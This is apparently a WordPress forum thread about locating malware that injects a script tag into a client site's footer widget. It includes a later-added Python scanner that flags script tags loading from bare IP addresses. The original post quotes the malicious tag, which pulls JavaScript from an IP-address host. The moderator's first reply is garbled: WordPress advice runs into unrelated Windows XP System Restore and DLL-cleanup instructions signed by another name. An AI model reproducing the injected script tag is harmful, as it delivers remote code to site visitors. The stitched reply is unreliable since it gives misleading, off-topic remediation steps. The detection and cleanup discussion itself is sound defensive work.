• Hi, I'm dealing with malware on a client website. There is one I haven't been able to locate; it's obviously obfuscated in code, but when rendering the website it shows up as this line: <div id="text-6" class="foot-widget widget_text"> <div class="textwidget"><script type="text/javascript" src="//128.199.161.173/proxy/9/image.js"></script></div>
    If anyone could give me a clue about where to find it in order to delete it, it would be of great help.
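
Added example, not part of the original thread: a scan of rendered HTML for script tags whose src host is a bare IP address, reporting the enclosing widget wrapper. It relies on general WordPress behaviour that the thread does not state (a wrapper id such as text-6 is `<id_base>-<instance>`, and that widget's settings live in the wp_options row `widget_<id_base>`); the function and variable names are hypothetical.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the fragment quoted in the post (outer div closed) plus a benign widget.
SAMPLE_HTML = """
<div id="text-6" class="foot-widget widget_text"> <div class="textwidget"><script type="text/javascript" src="//128.199.161.173/proxy/9/image.js"></script></div></div>
<div id="search-2" class="widget widget_search"><script src="/wp-includes/js/jquery/jquery.js"></script></div>
"""
WIDGET_ID = re.compile(r"^(.+)-(\d+)$")  # assumed wrapper id shape: <id_base>-<instance>

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class _Finder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.open_elems = []  # (tag, id) of the elements currently open
        self.hits = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        host = urlparse(attrs.get("src") or "").hostname if tag == "script" else None
        if host and is_ip_literal(host):
            # Nearest enclosing element whose id looks like a widget wrapper.
            m = next((WIDGET_ID.match(i) for _, i in reversed(self.open_elems)
                      if i and WIDGET_ID.match(i)), None)
            self.hits.append({"src": attrs["src"], "widget_id": m and m.group(0),
                              "option_name": m and "widget_" + m.group(1),
                              "instance": m and int(m.group(2))})
        self.open_elems.append((tag, attrs.get("id")))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; stray end tags are ignored.
        for i in range(len(self.open_elems) - 1, -1, -1):
            if self.open_elems[i][0] == tag:
                del self.open_elems[i:]
                break

def find_ip_scripts(html):
    finder = _Finder()
    finder.feed(html)
    return finder.hits

if __name__ == "__main__": print(find_ip_scripts(SAMPLE_HTML))
```

A hit with `option_name` of `widget_text` and `instance` 6 points at the stored Text widget to inspect; an id such as `post-12` matches the same pattern, so confirm the element is a widget wrapper before acting on it.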

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator James Huff

    (@macmanx)

    Remain calm and carefully follow this guide, which covers identifying and removing all currently known hack vectors.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    First, and most important, remember that this is the operating system you’re dealing with, so don’t leap into your system files, deleting things willy-nilly as soon as you suspect trouble. If you blow it, you may render Windows unbootable.

    Second, cover your behind at every step. System Restore (in Windows XP and Me) can safely return you to the point just before you crashed. Click Start, Programs (All Programs in XP), Accessories, System Tools, System Restore, select Create a restore point, and step through the wizard. Make a new restore point before each change.

    You may also need to make your system files visible. Open Explorer or any folder window, and click Tools, Folder Options, View. Click Show hidden files and folders, and make sure that both ‘Hide extensions for known file types’ and ‘Hide protected operating system files (Recommended)’ are unchecked. Click Yes if you see any Windows warnings. (More on warnings later.) Run your up-to-date antivirus and anti-spyware apps. Finally, delete a file only if you strongly believe it’s part of a malware infestation. For example, don’t use the following techniques to remove old DLLs from your system folders.
    Ethan Stark
    [Signature removed by moderator per forum rules.]

    • This reply was modified 8 years, 3 months ago by James Huff.
    • This reply was modified 8 years, 3 months ago by bdbrown.
    Thread Starter pabloec20

    (@pabloec20)

    Hi James, thanks a lot. I followed it before posting in the forums; it didn’t work for me. This seems to be a not well-known malware infection, so I was hoping for some more precise guidelines about where these widget texts are generated.

    Moderator James Huff

    (@macmanx)

    That particular guide covers every method we know for identifying and removing hack vectors, and if you follow it, considering the bulk-style methods it walks you through, you should take care of.

    If that didn’t work out, I suggest hiring someone for the task via https://jobs.wordpress.net/ or https://jetpack.pro/ and do not accept any hire or direct access offers posted to these forums, or hire a firm that specializes in this, like https://sucuri.net/ or https://vaultpress.com/

    Hi pabloec, did you manage to fix this?

    I found this malware on my site as well.

    Thank you,
    Luis

  • The topic ‘Help identifing location of malware’ is closed to new replies.